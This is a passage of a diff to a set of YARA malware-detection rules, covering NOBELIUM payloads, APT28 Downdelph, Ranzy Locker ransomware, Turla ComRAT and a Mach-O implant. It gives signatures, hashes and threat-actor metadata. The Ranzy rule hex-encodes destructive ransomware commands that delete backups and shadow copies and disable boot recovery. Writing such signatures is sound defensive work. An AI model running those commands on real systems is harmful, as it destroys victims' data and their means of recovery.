+		hash2 = "9059c5b46dce8595fcc46e63e4ffbceeed883b7b1c9a2313f7208a7f26a0c186"
+		tlp = "White"
+		adversary = "NOBELIUM"
 
 	strings:
-		$s1 = "Obsidium\\" fullword ascii
-		$s2 = "obsidium.dll" fullword ascii
-		$s3 = "Software\\Obsidium" fullword ascii
-		$s4 = "winmm.dll" fullword ascii
-		$s5 = "'license.key" fullword ascii
+		$s1 = "==typeof window&&window.window===window?window:" fullword ascii
+		$s2 = "==typeof self&&self.self===self?self:" fullword ascii
+		$s3 = "0===t?t={autoBom:!1}:" fullword ascii
+		$s4 = "_global.saveAs=saveAs.saveAs=saveAs" fullword ascii
+		$s5 = "navigator.userAgent" fullword ascii
+		$s6 = { 6e 65 77 20 42 6c 6f 62 28 5b [1-12] 5d 2c 20 7b 74 79 70 65 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 22 7d 29 3b 73 61 76 65 41 73 28 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 3 of ( $s* )
+		filesize > 100KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_2 : FILE
+rule ARKBIRD_SOLG_MAL_Enc_Payload_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect RYUK ransomware (Sept_2020_V1 + V2)"
+		description = "Detect encrypted payload, must be with others APT29 rules maybe give lot fake postives due to the pdf header"
 		author = "Arkbird_SOLG"
-		id = "82ed6736-00e6-5a30-89cf-a2b86f2e1ba6"
-		date = "2020-10-25"
-		modified = "2020-10-28"
+		id = "34da1d06-7892-59ec-8b11-c3278a7f2e34"
+		date = "2021-05-28"
+		modified = "2021-06-02"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_2.yar#L1-L29"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_Enc_payload_May_2021_1.yara#L1-L17"
 		license_url = "N/A"
-		logic_hash = "a06d61b9363b732d17a2766b280951198a6adc226e284ab1d909cd98516cfb6f"
-		score = 75
-		quality = 46
+		logic_hash = "484d9947d8acd32126cdc3e3f671cd3b3b048bbdb608d5573f6fcc7e4ddf13f8"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "d0d7a8f588693b7cc967fb4069419125625eb7454ba553c0416f35fc95307cbe"
-		hash2 = "d7333223dcc1002aae04e25e31d8c297efa791a2c1e609d67ac6d9af338efbe8"
-		hash3 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b"
-		hash4 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8"
-		hash5 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399"
-		hash6 = "5b1f242aee0eabd4dffea0fe5f08aba60abf7c8d1e4f7fc7357af7f20ccd0204"
+		hash1 = "23e20d630a8fd12600c2811d8f179f0e408dcb3e82600456db74cbf93a66e70f"
+		hash2 = "656384c4e5f9fe435d51edf910e7ba28b5c6d183587cf3e8f75fb2d798a01eeb"
+		level = "Experimental"
+		tlp = "White"
+		adversary = "NOBELIUM"
 
 	strings:
-		$s1 = "Type Descriptor'" fullword ascii
-		$s2 = "Class Hierarchy Descriptor'" fullword ascii
-		$s3 = "GET:PV" fullword ascii
-		$s4 = "Base Class Descriptor at (" fullword ascii
-		$s5 = "Complete Object Locator'" fullword ascii
-		$s6 = "UINi\\cYIqwxAcV^GYCY^EgzUvSZcsRW" fullword ascii
-		$s7 = "FrystFsgcteIaui" fullword ascii
-		$s8 = "delete[]" fullword ascii
-		$s9 = "Picuovphv Bbsg!Es|rwojrarkkd Stryjfes x4.3" fullword ascii
-		$s10 = "FrystGfuvrozHctj" fullword ascii
-		$s11 = "FrystUfngasfCqovf{v" fullword ascii
-		$op1 = { 63 62 6d 75 6a 7a 6e 49 4d 54 50 78 75 70 78 59 6f 65 71 4f 57 48 4a 78 57 71 4c 50 55 78 4a 6e 68 4b 71 57 57 6d 49 75 6a 51 64 4f 50 74 70 63 76 61 42 72 75 5a 6a 4d 69 79 59 52 69 58 78 4a 63 6b 51 70 4b 75 47 52 5a 51 42 5a 5a 61 50 69 76 66 77 43 6c 45 5a 67 76 6e 49 6c 54 74 4b 46 4d 68 53 4a 42 4f 64 6a 69 46 44 4d 62 70 78 76 52 5a 69 61 74 69 71 5a 6e 75 67 5a 62 78 72 51 }
-		$op2 = { 23 71 59 72 51 6d 58 48 4a 77 65 55 53 76 68 79 4f 62 51 50 6d 44 44 52 44 6e 72 49 53 57 6c 72 56 4a 56 75 68 52 4e 4a 66 6b 50 6e 6b 72 65 68 73 6e 6b 68 54 4e 70 6a 56 7a 7a 64 61 44 6e 62 44 67 5a 54 62 4b 65 63 54 69 35 4f 71 20 64 24 2d }
+		$s1 = { 25 50 44 46 2d 31 2e 33 0a 25 06 8b c4 1c c5 86 66 f3 dc 75 f9 3b dd 8c 44 e3 d3 a4 74 9d 94 4e 2e 0f d9 01 a6 f2 88 6a a8 0b 16 1b 1a fc 60 3f 72 7a 1b c1 a7 bb 2f 19 31 6d 6f 79 db 20 f6 c7 fa e7 eb b9 88 77 de 1f a1 92 d7 ea 68 a9 b7 89 17 92 e8 b2 bb a5 58 56 b4 30 60 f8 28 0c 54 7b 2b 68 ba 7e 01 01 6d ad 2e 6d 72 67 1e b0 a8 ea 42 82 bd 14 9a 86 f0 0d 9a 8b 92 76 b3 b3 7d ef 69 24 2c 9f c2 ca e9 c9 b3 }
+		$s2 = { 25 25 45 4f 46 0a }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 6 of ( $s* ) and 1 of ( $op* )
+		filesize > 50KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT28_VHD_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_APT28_Downdelph_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect suspicious VHD file with APT28 artefacts inside (November 2020)"
+		description = "Detect Downdelph used by APT28 group"
 		author = "Arkbird_SOLG"
-		id = "25452eaa-f135-5b7f-a523-67715a2ab9f7"
-		date = "2020-12-09"
-		modified = "2020-12-10"
-		reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L3-L35"
+		id = "0376c026-93eb-526a-8ab3-26bdd365e608"
+		date = "2021-02-18"
+		modified = "2021-02-19"
+		reference = "https://twitter.com/RedDrip7/status/1362343352759250946"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-18/APT28/APT_APT28_Downdelph_Feb_2021_1.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "d72c3428cf731feb63c59ef109b99ec234e69bb6df34bdde928cc4b886f0533b"
-		score = 50
-		quality = 69
+		logic_hash = "15e38ceeb0410645938ce2f90becf9a344711efd6e539f304de7b413f6f3b420"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30"
+		hash1 = "ee7cfc55a49b2e9825a393a94b0baad18ef5bfced67531382e572ef8a9ecda4b"
 
 	strings:
-		$c1 = { 49 6e 76 61 6c 69 64 20 70 61 72 74 69 74 69 6f 6e 20 74 61 62 6c 65 00 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 4d 69 73 73 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 00 00 63 7b }
-		$c2 = { 52 90 4e 54 46 53 }
-		$c3 = { 41 20 64 69 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 }
-		$c4 = { 42 00 4f 00 4f 00 54 00 4d 00 47 00 52 00 04 00 24 00 49 00 33 00 30 }
-		$c5 = { 4e 00 54 00 4c 00 44 00 52 00 07 00 42 00 4f 00 4f 00 54 00 54 00 47 00 54 00 07 00 42 00 4f 00 4f 00 54 00 4e 00 58 00 54 }
-		$c6 = { 46 49 4c 45 30 00 03 00 8? ?d }
-		$c7 = { 24 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 60 00 00 00 40 }
-		$s1 = { 46 61 73 74 4d 4d 20 42 6f 72 6c 61 6e 64 20 45 64 69 74 69 6f 6e 20 a9 20 32 30 30 34 2c 20 32 30 30 35 20 50 69 65 72 72 65 20 6c 65 20 52 69 63 68 65 20 2f 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c 20 53 6f 66 74 77 61 72 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 }
-		$s2 = { 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 }
-		$s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c }
-		$s4 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 00 00 6c 61 79 6f 75 74 20 74 65 78 74 }
-		$s5 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 }
-		$s6 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 }
-		$s7 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 00 11 00 53 00 74 00 72 00 65 00 61 00 6d 00 20 00 72 00 65 00 61 00 64 00 20 00 65 00 72 00 72 00 6f 00 72 }
-		$s8 = { 25 73 2c 20 43 6c 61 73 73 49 44 3a 20 25 73 }
-		$s9 = { 43 6f 6e 6e 65 63 74 4b 69 6e 64 b0 10 40 00 44 00 00 ff 44 00 00 ff 01 00 00 00 00 00 00 80 00 00 00 80 04 00 11 52 65 6d 6f 74 65 4d 61 63 68 69 6e 65 4e 61 6d 65 }
-		$s10 = { 22 20 4e 54 2f 20 [1-4] 20 4f 4d 2f 20 45 54 55 4e 49 4d 20 43 53 2f 20 65 74 61 65 72 43 2f 20 73 6b 73 61 74 68 63 73 }
-		$s11 = { 2f 2f 3a 70 74 74 68 }
+		$s1 = { 53 [1-3] 81 c4 [2] ff ff 8b f2 8b ?? 54 8d 44 24 08 50 68 04 01 00 00 8b ?? e8 [12-22] 8d 54 24 04 8b c6 [73-133] 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 0c 89 01 89 51 04 8b 45 f0 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 10 89 01 89 51 04 8b c3 5b 8b e5 5d }
+		$s2 = "cmd.exe /c " fullword ascii
+		$s3 = "Failed to Save Stream %s is already associated with %s=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
+		$s4 = { 53 00 79 00 73 00 74 00 65 00 6d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4b 00 65 00 79 00 62 00 6f 00 61 00 72 00 64 00 20 00 4c 00 61 00 79 00 6f 00 75 00 74 00 73 00 5c 00 25 00 2e 00 38 00 78 }
+		$s5 = { 4a 00 50 00 45 00 47 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 23 00 25 00 64 }
+		$s6 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x33c0 and filesize > 40KB and 5 of ( $c* ) and 8 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of them
 }
-
-rule ARKBIRD_SOLG_APT_APT28_Zebrocy_GO_Downloader_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_Ran_Ranzy_Locker_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Zebrocy Go downloader (November 2020)"
+		description = " Detect Ranzy Locker (RAAS)"
 		author = "Arkbird_SOLG"
-		id = "114c0297-7168-5d20-b56b-89b0b47f18c7"
-		date = "2020-12-09"
-		modified = "2020-12-10"
-		reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L37-L65"
+		id = "7e81d73a-ef18-5f89-b6b3-f56212d30b4a"
+		date = "2020-11-19"
+		modified = "2020-11-19"
+		reference = "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-19/Ranzy_Locker/Ran_Ranzy_Locker_Nov_2020_1.yar#L1-L36"
 		license_url = "N/A"
-		logic_hash = "e7b2e7c250f3a98127399176adf9f93b758f0a5111e126dd0a75a3fb95a48da9"
-		score = 50
-		quality = 61
+		logic_hash = "e27017fa196d14b88c5cb682a070d10e42b63f9e21189d9917c0ae03c47216cc"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "61c2e524dcc25a59d7f2fe7eff269865a3ed14d6b40e4fea33b3cd3f58c14f19"
-		hash2 = "f36a0ee7f4ec23765bb28fbfa734e402042278864e246a54b8c4db6f58275662"
+		hash1 = "393fd0768b24cd76ca653af3eba9bff93c6740a2669b30cf59f8a064c46437a2"
+		hash2 = "90691a36d1556ba7a77d0216f730d6cd9a9063e71626489094313c0afe85a939"
+		hash3 = "ade5d0fe2679fb8af652e14c40e099e0c1aaea950c25165cebb1550e33579a79"
+		hash4 = "bbf122cce1176b041648c4e772b230ec49ed11396270f54ad2c5956113caf7b7"
+		hash5 = "c4f72b292750e9332b1f1b9761d5aefc07301bc15edf31adeaf2e608000ec1c9"
 
 	strings:
-		$c1 = "os.(*ProcessState).sys" fullword ascii
-		$c2 = "os/exec.(*ExitError).Sys" fullword ascii
-		$c3 = "os/exec.ExitError.Sys" fullword ascii
-		$c4 = "os.(*ProcessState).Sys" fullword ascii
-		$p1 = "syscall.CreatePipe" fullword ascii
-		$p2 = "os.Pipe" fullword ascii
-		$p3 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 70 69 70 65 29 2e 63 6c 6f 73 65 44 6f 6e 65 4c 6f 63 6b 65 64 }
-		$p4 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 63 6c 69 65 6e 74 53 74 72 65 61 6d 29 2e 67 65 74 53 74 61 72 74 65 64 57 72 69 74 65 }
-		$op1 = { 75 5f 67 3d 25 73 20 25 71 25 73 2a 25 64 25 73 3d 25 73 26 23 33 34 3b 26 23 33 39 3b 26 61 6d 70 3b }
-		$op2 = { 70 63 3d 25 21 28 4e 4f 56 45 52 42 29 25 21 57 65 65 6b 64 61 79 28 25 73 7c 25 73 25 73 7c 25 73 28 42 41 44 49 4e 44 45 58 29 }
-		$op3 = { 48 54 54 50 5f 50 52 4f 58 59 48 6f 73 74 3a 20 25 73 0d 0a 49 50 20 61 64 64 72 65 73 73 4b 65 65 70 2d 41 6c 69 76 65 }
-		$op4 = { 63 6f 6e 6e 65 63 74 69 6f 6e 20 65 72 72 6f 72 3a 20 25 73 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 69 6d 65 64 20 6f 75 74 }
-		$op5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d }
-		$op6 = { 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d }
+		$s1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
+		$s2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
+		$s3 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
+		$s4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
+		$s5 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
+		$s6 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573"
+		$s7 = "7B5549447D" ascii
+		$s8 = "7B5041545445524E5F49447D" ascii
+		$s9 = "726561646D652E747874" ascii
+		$s10 = "226E6574776F726B223A22" ascii
+		$s11 = "226C616E67223A22" ascii
+		$s12 = "7B4558547D" ascii
+		$s13 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838"
+		$s14 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii
+		$s15 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii
+		$s16 = "227375626964223A22" ascii
+		$s17 = "22657874223A22" ascii
+		$s18 = "226B6579223A22" ascii
+		$seq1 = { 8b 46 50 8d 4d a4 83 7d d4 10 53 8b 1d 14 80 41 00 89 45 a4 8d 45 c0 0f 43 45 c0 51 50 6a 00 6a 01 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 b9 00 00 00 8b 46 68 8d 4d a4 83 7d ec 10 57 89 45 a4 8d 45 d8 0f 43 45 d8 33 ff 51 50 6a 00 47 57 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 8a 00 00 00 c6 45 fc 02 33 db 8b 45 e8 8b 4d d0 03 c1 6a 0f 5a 89 5d b8 89 55 bc 88 5d a8 89 7d a4 3b c2 76 15 88 5d a0 8d 4d a8 ff 75 a0 50 e8 78 02 00 00 8b 4d d0 89 5d b8 83 7d d4 10 8d 45 c0 51 0f 43 45 c0 8d 4d a8 50 e8 ca de ff ff 83 7d ec 10 8d 45 d8 ff 75 e8 0f 43 45 d8 8d 4d a8 50 e8 b3 de ff ff 8d 45 a8 50 8d 4e 70 e8 b8 d8 ff ff 8d 4d a8 e8 3f bf ff ff 8d 4d d8 e8 37 bf ff ff 8d 4d c0 e8 2f bf ff ff b0 01 eb 12 8d 4d d8 e8 23 bf ff ff 8d 4d c0 e8 1b bf ff ff 32 c0 e8 3f f1 }
+		$seq2 = { 8b 75 08 33 ff 8b 55 0c 33 c0 89 b5 68 fb ff ff 89 bd ac fb ff ff c7 85 b0 fb ff ff 07 00 00 00 66 89 85 9c fb ff ff 89 7d fc 39 7a 10 0f 84 da 00 00 00 6a 02 0f 57 c0 8d 8d 84 fb ff ff 58 66 0f 13 85 bc fb ff ff 66 89 85 b4 fb ff ff e8 6e ac ff ff 83 78 14 10 72 02 8b 00 50 ff 15 18 82 41 00 8d 8d 84 fb ff ff 89 85 b8 fb ff ff e8 8f a8 ff ff 68 87 69 00 00 ff 15 0c 82 41 00 bb 01 04 00 00 66 89 85 b6 fb ff ff 53 8d 85 c4 fb ff ff 57 50 e8 fd 2d 00 00 83 c4 0c 8d 7d cc 33 c0 6a 08 59 6a 08 6a 20 f3 ab 8d 45 cc 50 53 8d 85 c4 fb ff ff 50 6a 10 8d 85 b4 fb ff ff 50 ff 15 1c 82 41 00 85 c0 75 45 8d 85 c4 fb ff ff 50 8d 8d 6c fb ff ff e8 7f a8 ff ff 8b d0 c6 45 fc 01 8d 8d 84 fb ff ff e8 26 ab ff ff 50 8d 8d 9c fb ff ff e8 88 bf ff ff 8d 8d 84 fb ff ff e8 c8 c2 ff ff 8d 8d 6c fb ff ff e8 f5 a7 ff ff 8d 85 9c fb }
 
 	condition:
-		uint16( 0 ) == 0x4d5a and filesize > 800KB and ( pe.imphash ( ) == "91802a615b3a5c4bcc05bc5f66a5b219" ) and 3 of ( $c* ) and 3 of ( $p* ) and 3 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 10 of ( $s* ) and 1 of ( $seq* )
 }
-rule ARKBIRD_SOLG_Ran_ELF_EXX_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_APT_Turla_Comrat_Chinch_V4_Jan_2021_1 : FILE
 {
 	meta:
-		description = "Detect EXX variant ELF ransomware"
+		description = "Detect ComRAT V4 (Chinch) used by APT Turla group"
 		author = "Arkbird_SOLG"
-		id = "fe85d480-317a-51c3-a817-fc9034e2944f"
-		date = "2020-12-09"
-		modified = "2020-12-09"
+		id = "7d4daf3d-eed9-59fb-a4b9-fbc1c72adfcd"
+		date = "2021-01-23"
+		modified = "2021-01-26"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/EXX/Ran_ELF_EXX_Nov_2020_1.yar#L1-L28"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-23/Turla/APT_Turla_ComRAT_Chinch_V4_Jan_2021_1.yar#L1-L28"
 		license_url = "N/A"
-		logic_hash = "4508a0cf79d0d85959009f59e1471cbf123fa24f5c21da5801e91ed0bbe8a085"
-		score = 50
-		quality = 73
+		logic_hash = "0d92207c4716f8d2fbf1d4f0cf3a33c38417fdd1565c87c251f7ff290135c435"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "cb408d45762a628872fa782109e8fcfc3a5bf456074b007de21e9331bb3c5849"
+		hash1 = "a62e1a866bc248398b6abe48fdb44f482f91d19ccd52d9447cda9bc074617d56"
 
 	strings:
-		$dbg1 = { 55 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 2c 20 72 65 74 75 72 6e 20 63 6f 64 65 20 3d 20 25 30 38 58 0a }
-		$dbg2 = { 47 72 65 65 74 69 6e 67 73 20 [3-10] 21 }
-		$dbg3 = { 63 79 63 6c 65 73 3d 25 6c 75 20 72 61 74 69 6f 3d 25 6c 75 20 6d 69 6c 6c 69 73 65 63 73 3d 25 6c 75 20 73 65 63 73 3d 25 6c 75 20 68 61 72 64 66 61 69 6c 3d 25 64 20 61 3d 25 6c 75 20 62 3d 25 6c 75 0a }
-		$dbg4 = { 53 48 41 2d 25 64 20 74 65 73 74 20 23 25 64 3a }
-		$lib1 = "pthread_mutex_unlock@@GLIBC_2.2.5" fullword ascii
-		$lib2 = "pthread_mutex_lock@@GLIBC_2.2.5" fullword ascii
-		$lib3 = "mbedtls_rsa_import" fullword ascii
-		$lib4 = "mbedtls_rsa_export" fullword ascii
-		$lib5 = "mbedtls_oid_get_extended_key_usage" fullword ascii
-		$lib6 = "mbedtls_sha256_process" fullword ascii
-		$seq1 = { 48 83 ec 20 89 7d ec 48 89 75 e0 b8 00 00 00 00 e8 77 00 00 00 48 8d 45 f0 b9 00 00 00 00 48 8d 15 b5 ff ff ff be 00 00 00 00 48 89 c7 e8 d6 fb ff ff c7 45 fc 01 00 00 00 eb }
-		$seq2 = { 00 00 00 00 e8 b2 fe ff ff 48 8b 45 e8 48 89 c7 e8 92 ed ff ff 48 83 c0 01 48 89 c7 e8 c6 ee ff ff 48 89 45 f8 48 83 7d f8 00 74 3a 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 f8 ec ff ff 48 8b 45 f8 48 89 c7 e8 12 fd ff ff 48 8b 45 f8 48 89 c7 e8 90 ec ff ff b8 00 00 00 00 e8 95 fc ff ff }
-		$seq3 = { e5 41 55 41 54 53 48 81 ec 18 18 00 00 c7 45 dc 00 00 00 00 48 c7 45 d0 00 00 00 00 bf 00 00 00 00 e8 13 fd ff ff 89 c7 e8 7c fc ff ff e8 d7 fd ff ff 41 89 c5 e8 cf fd ff ff 41 89 c4 e8 c7 fd ff ff 89 c3 e8 c0 fd ff ff 89 c2 48 8d 85 d0 e7 ff ff 4d 89 e9 4d 89 e0 48 89 d9 48 8d 35 bf 0a 02 00 48 89 }
+		$com1 = "state->_reprocess_current_token || token.type != GUMBO_TOKEN_START_TAG || token.v.start_tag.attributes.data == NULL" fullword wide
+		$com2 = "fragment_ctx != GUMBO_TAG_LAST" fullword wide
+		$com3 = "has_matching_a == 1" fullword wide
+		$com4 = "ODFA: %u %d %u" fullword ascii
+		$com5 = "Custom browser path is empty." fullword ascii
+		$com6 = "Default browser path is:" fullword ascii
+		$com7 = "Search for browser path." fullword ascii
+		$com8 = "Cant retrieve any path." fullword ascii
+		$com9 = "Custom browser path is:" fullword ascii
+		$jmp1 = { 2e 64 6c 6c 00 55 4d 45 50 00 56 46 45 50 }
+		$jmp2 = { 33 c9 e9 ?? ?? ff ff cc cc cc cc cc cc cc cc cc }
+		$seq1 = { 40 55 48 8d ac 24 00 fd ff ff 48 81 ec 00 04 00 00 48 8b 05 80 46 1b 00 48 33 c4 48 89 85 d0 02 00 00 b9 d8 02 00 00 e8 f4 8b 07 00 4c 8b 0d c5 a5 1c 00 48 8d 95 00 01 00 00 4c 8b 05 af a5 1c 00 48 8d 0d c8 9d 1c 00 4d 2b c8 48 89 05 ae 8a 1d 00 e8 a9 7e fc ff 48 83 bd 18 01 00 00 10 48 8d 8d 00 01 00 00 48 0f 43 8d 00 01 00 00 ff 15 24 f3 0c 00 48 8b 15 25 f3 0c 00 48 8b c8 e8 6d 59 fb ff 48 8b 95 18 01 00 00 48 83 fa 10 }
+		$seq2 = { 41 8b 41 08 83 e8 09 83 f8 08 }
+		$seq3 = { 48 8b 03 48 8b cb ff 50 08 48 8b 95 f8 01 00 00 48 83 fa 08 72 39 48 8b 8d e0 }
+		$seq4 = { b8 09 00 00 00 44 88 a5 60 01 00 00 48 8d 8d 60 01 00 00 f3 0f 7f 85 70 01 00 00 e8 c1 19 fc ff ba df 5e ca 76 48 8d 4d 50 e8 63 ea fc ff 48 8b c8 48 8d 95 60 01 00 00 e8 c4 cb ff ff 0f b6 15 dd 8b 1c 00 48 8b c8 e8 35 cd ff ff 48 8b 95 78 01 00 00 48 83 fa 10 72 34 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize > 80KB and 3 of ( $dbg* ) and 4 of ( $lib* ) and 2 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 1000KB and 6 of ( $com* ) and all of ( $jmp* ) and 3 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Skinnyboy_Implant_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Mailo_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect SkinnyBoy Implant"
+		description = "Detect the Mach-O malware"
 		author = "Arkbird_SOLG"
-		id = "2c78e0f3-a0b3-56fb-b4d2-313c03f1331b"
-		date = "2021-06-05"
-		modified = "2021-06-06"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Implant_Jun_2021_1.yara#L1-L19"
+		id = "4c975200-fce4-5a2a-b565-6d397c4e0b1c"
+		date = "2021-06-09"
+		modified = "2021-06-21"
+		reference = "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/MAIL-O/MAL_MailO_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "37d6b03adaad0a97e91a366d8e5ce47bc0eb77263849422129edf9df28d25bd8"
+		logic_hash = "165c5fd90039c14ef1fa1e80bb7f14761e991b09560c5f1da2ddf9a0eadee623"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
+		hash1 = "3a77f108e32b34e184f9ade66292cd73abbd297b4829ba63a973a400cc7f3f9f"
+		hash2 = "603881f4c80e9910ab22f39717e8b296910bff08cd0f25f78d5bff1ae0dce5d7"
 		tlp = "White"
-		adversary = "APT28"
+		adversary = "TA428"
 
 	strings:
